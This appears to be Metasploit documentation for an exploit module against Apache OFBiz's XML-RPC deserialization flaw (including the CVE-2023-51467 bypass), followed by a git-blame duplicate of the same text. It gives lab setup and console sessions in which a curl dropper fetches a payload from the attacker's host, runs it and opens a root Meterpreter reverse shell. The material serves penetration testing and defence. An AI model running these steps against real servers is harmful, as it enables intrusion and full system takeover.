documentation/modules/exploit/linux/http/apache_ofbiz_deserialization.md

## Vulnerable Application

### Description

This module exploits a Java deserialization vulnerability in Apache
OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
versions prior to 17.12.01 using the `ROME` gadget chain.

Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467
and use the `CommonsBeanutils1` gadget chain.

Verified working on 18.12.09, 17.12.01, and 15.12

### Setup

#### 15.12

You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.

1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
    * `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`

#### 18.12.09

`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Targets

### 0

This executes a Unix command.

### 1

This uses a Linux dropper to execute code.

## Options

## Scenarios

### Apache OFBiz from [Docker](#setup) 15.12.

```
msf > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf exploit(linux/http/apache_ofbiz_deserialization) > options

Module options (exploit/linux/http/apache_ofbiz_deserialization):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8443             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(linux/http/apache_ofbiz_deserialization) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8888
srvport => 8888
msf exploit(linux/http/apache_ofbiz_deserialization) > run

[*] Started HTTPS reverse handler on https://192.168.1.7:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target can deserialize arbitrary data.
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://0.0.0.0:8888/AGB4cD
[*] Local IP: http://10.3.227.250:8888/AGB4cD
[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv"]
[*] Executing command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv
[*] Client 192.168.1.7 (curl/7.38.0) requested /AGB4cD
[*] Sending payload to 192.168.1.7 (curl/7.38.0)
[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Redirecting stageless connection from /1fY1FTBqS3Z81nrUI-E3VQ3E-Kqn5Kx4lP2cAzF4bmUgveaMUNylCEh1ohulKhz1fERPwYd8u4DAauCLZ8UDm5JaB7P with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Attaching orphaned/stageless session...
[*] Command Stager progress - 104.14% done (151/145 bytes)
[*] Meterpreter session 1 opened (192.168.1.7:8443 -> 192.168.1.7:61375) at 2020-08-14 21:42:11 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ 09d1564c6b2c (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Debian 8.4 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

### Apache OFBiz from [Docker](#setup) 18.12.09.

```
[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080
rport => 8080
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999
srvport => 8999
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999
lport => 9999
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1
lhost => 172.17.0.1
[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit

[*] Started HTTPS reverse handler on https://172.17.0.1:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache OFBiz detected
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https
[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG
[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG
[*] Sending payload to 172.17.0.2 (curl/7.74.0)
[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'
[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500
[*] Server stopped.

(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid
Server username: root
(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo
Computer     : 172.17.0.2
OS           : Debian 11.4 (Linux 6.5.0-kali3-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/usr/src/apache-ofbiz) > 
```
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`## Vulnerable Application`

			`### Description`

			`This module exploits a Java deserialization vulnerability in Apache`
			OFBiz's unauthenticated XML-RPC endpoint `/webtools/control/xmlrpc` for
fix ofbiz auto detection 2024-02-06 16:45:02 -05:00			versions prior to 17.12.01 using the `ROME` gadget chain.
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00
ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00			`Versions up to 18.12.11 are exploitable utilizing an auth bypass CVE-2023-51467`
fix ofbiz auto detection 2024-02-06 16:45:02 -05:00			and use the `CommonsBeanutils1` gadget chain.
ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00
fix ofbiz auto detection 2024-02-06 16:45:02 -05:00			`Verified working on 18.12.09, 17.12.01, and 15.12`
ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`### Setup`

non-working module 2024-01-08 19:47:24 -05:00			`#### 15.12`

Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`You can use <https://hub.docker.com/r/opensourceknight/ofbiz>.`

Add a new Java Deserialization mixin and use it to set the shell 2021-02-16 14:36:38 -05:00			1. Initialize the database with demo data (`INIT_DB=2`) and bind to ports 8080 and 8443
non-working module 2024-01-08 19:47:24 -05:00			* `docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 opensourceknight/ofbiz:15.12`

			`#### 18.12.09`

non-working module 2024-01-08 19:49:47 -05:00			`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
Adjust XML whitespace and add commands to the setup docs 2020-08-17 10:03:44 -04:00
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`## Verification Steps`

			`Follow [Setup](#setup) and [Scenarios](#scenarios).`

			`## Targets`

			`### 0`

			`This executes a Unix command.`

			`### 1`

			`This uses a Linux dropper to execute code.`

ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00			`## Options`

Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`## Scenarios`

ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00			`### Apache OFBiz from [Docker](#setup) 15.12.`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00
			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/apache_ofbiz_deserialization`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`[*] Using configured payload linux/x64/meterpreter_reverse_https`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/apache_ofbiz_deserialization) > options`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00
Fix "apache_ofbiz_deserialiation" typo in its doc 2021-05-01 17:23:52 -05:00			`Module options (exploit/linux/http/apache_ofbiz_deserialization):`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00
			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`Proxies no A proxy chain of format type:host:port[,type:host:port][...]`
			`RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'`
Set SSL as a DefaultOption and update RPORT 2020-08-14 16:43:35 -05:00			`RPORT 8443 yes The target port (TCP)`
			`SSL true no Negotiate SSL/TLS for outgoing connections`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`SSLCert no Path to a custom SSL certificate (default is randomly generated)`
			`TARGETURI / yes Base path`
			`URIPATH no The URI to use for this exploit (default is random)`
			`VHOST no HTTP server virtual host`


			`Payload options (linux/x64/meterpreter_reverse_https):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The local listener hostname`
			`LPORT 8443 yes The local listener port`
			`LURI no The HTTP Path`


			`Exploit target:`

			`Id Name`
			`-- ----`
			`1 Linux Dropper`


Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`rhosts => 127.0.0.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/apache_ofbiz_deserialization) > set lhost 192.168.1.7`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`lhost => 192.168.1.7`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8888`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`srvport => 8888`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/apache_ofbiz_deserialization) > run`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00
			`[*] Started HTTPS reverse handler on https://192.168.1.7:8443`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target is vulnerable. Target can deserialize arbitrary data.`
			`[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https`
Execute commands in a shell 2020-08-14 21:38:52 -05:00			`[*] Using URL: http://0.0.0.0:8888/AGB4cD`
			`[*] Local IP: http://10.3.227.250:8888/AGB4cD`
			`[*] Generated command stager: ["curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv"]`
			`[*] Executing command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv`
			`[*] Client 192.168.1.7 (curl/7.38.0) requested /AGB4cD`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`[*] Sending payload to 192.168.1.7 (curl/7.38.0)`
Execute commands in a shell 2020-08-14 21:38:52 -05:00			`[+] Successfully executed command: sh -c curl${IFS}-so${IFS}/tmp/fNZHtLgv${IFS}http://192.168.1.7:8888/AGB4cD;chmod${IFS}+x${IFS}/tmp/fNZHtLgv;/tmp/fNZHtLgv;rm${IFS}-f${IFS}/tmp/fNZHtLgv`
			`[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Redirecting stageless connection from /1fY1FTBqS3Z81nrUI-E3VQ3E-Kqn5Kx4lP2cAzF4bmUgveaMUNylCEh1ohulKhz1fERPwYd8u4DAauCLZ8UDm5JaB7P with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'`
			`[*] https://192.168.1.7:8443 handling request from 192.168.1.7; (UUID: btpun2w7) Attaching orphaned/stageless session...`
			`[*] Command Stager progress - 104.14% done (151/145 bytes)`
			`[*] Meterpreter session 1 opened (192.168.1.7:8443 -> 192.168.1.7:61375) at 2020-08-14 21:42:11 -0500`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`[*] Server stopped.`

			`meterpreter > getuid`
Execute commands in a shell 2020-08-14 21:38:52 -05:00			`Server username: root @ 09d1564c6b2c (uid=0, gid=0, euid=0, egid=0)`
Add Apache OFBiz XML-RPC Java deserialization 2020-08-13 00:10:46 -05:00			`meterpreter > sysinfo`
			`Computer : 172.17.0.2`
			`OS : Debian 8.4 (Linux 4.19.76-linuxkit)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`meterpreter >`
			```
ofbiz working for 18.12.09 2024-01-16 20:06:11 -05:00
			`### Apache OFBiz from [Docker](#setup) 18.12.09.`

			```
			`[msf](Jobs:0 Agents:0) > use exploit/linux/http/apache_ofbiz_deserialization`
			`[*] Using configured payload linux/x64/meterpreter_reverse_https`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1`
			`rhosts => 127.0.0.1`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set ssl false`
			`[!] Changing the SSL option's value may require changing RPORT!`
			`ssl => false`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set rport 8080`
			`rport => 8080`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set srvport 8999`
			`srvport => 8999`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lport 9999`
			`lport => 9999`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > set lhost 172.17.0.1`
			`lhost => 172.17.0.1`
			`[msf](Jobs:0 Agents:0) exploit(linux/http/apache_ofbiz_deserialization) > exploit`

			`[*] Started HTTPS reverse handler on https://172.17.0.1:9999`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[!] The service is running, but could not be validated. Apache OFBiz detected`
			`[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_https`
			`[*] Using URL: http://172.17.0.1:8999/t8Ht92vyG`
			`[*] Client 172.17.0.2 (curl/7.74.0) requested /t8Ht92vyG`
			`[*] Sending payload to 172.17.0.2 (curl/7.74.0)`
			`[+] Successfully executed command: curl -so /tmp/ccOiSBWw http://172.17.0.1:8999/t8Ht92vyG;chmod +x /tmp/ccOiSBWw;/tmp/ccOiSBWw;rm -f /tmp/ccOiSBWw`
			`[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwc954AkmwDFJGPdMCAemNwEhbK9MZE1sbFjd87crw4EoQ8IRya-nD4j7s9vkiPXENKkm6Hai6rTX1l6MxXV with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'`
			`[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwBlG7PmcChFTs3mrZWe19ux0Ge4-K3sXMWLGzskiOvEJN9O34cT2vhArtS36BI-SM8HDCBKggdyux0 with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'`
			`[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Redirecting stageless connection from /bor18uxq2-DRFNcWtLP2lwS1jEDX4_Jx7YDDvUtpywgCk with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0'`
			`[*] https://172.17.0.1:9999 handling request from 172.17.0.2; (UUID: jfvsjqze) Attaching orphaned/stageless session...`
			`[*] Command Stager progress - 100.00% done (112/112 bytes)`
			`[*] Meterpreter session 1 opened (172.17.0.1:9999 -> 172.17.0.2:47500) at 2024-01-16 20:04:06 -0500`
			`[*] Server stopped.`

			`(Meterpreter 1)(/usr/src/apache-ofbiz) > getuid`
			`Server username: root`
			`(Meterpreter 1)(/usr/src/apache-ofbiz) > sysinfo`
			`Computer : 172.17.0.2`
			`OS : Debian 11.4 (Linux 6.5.0-kali3-amd64)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`(Meterpreter 1)(/usr/src/apache-ofbiz) >`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			```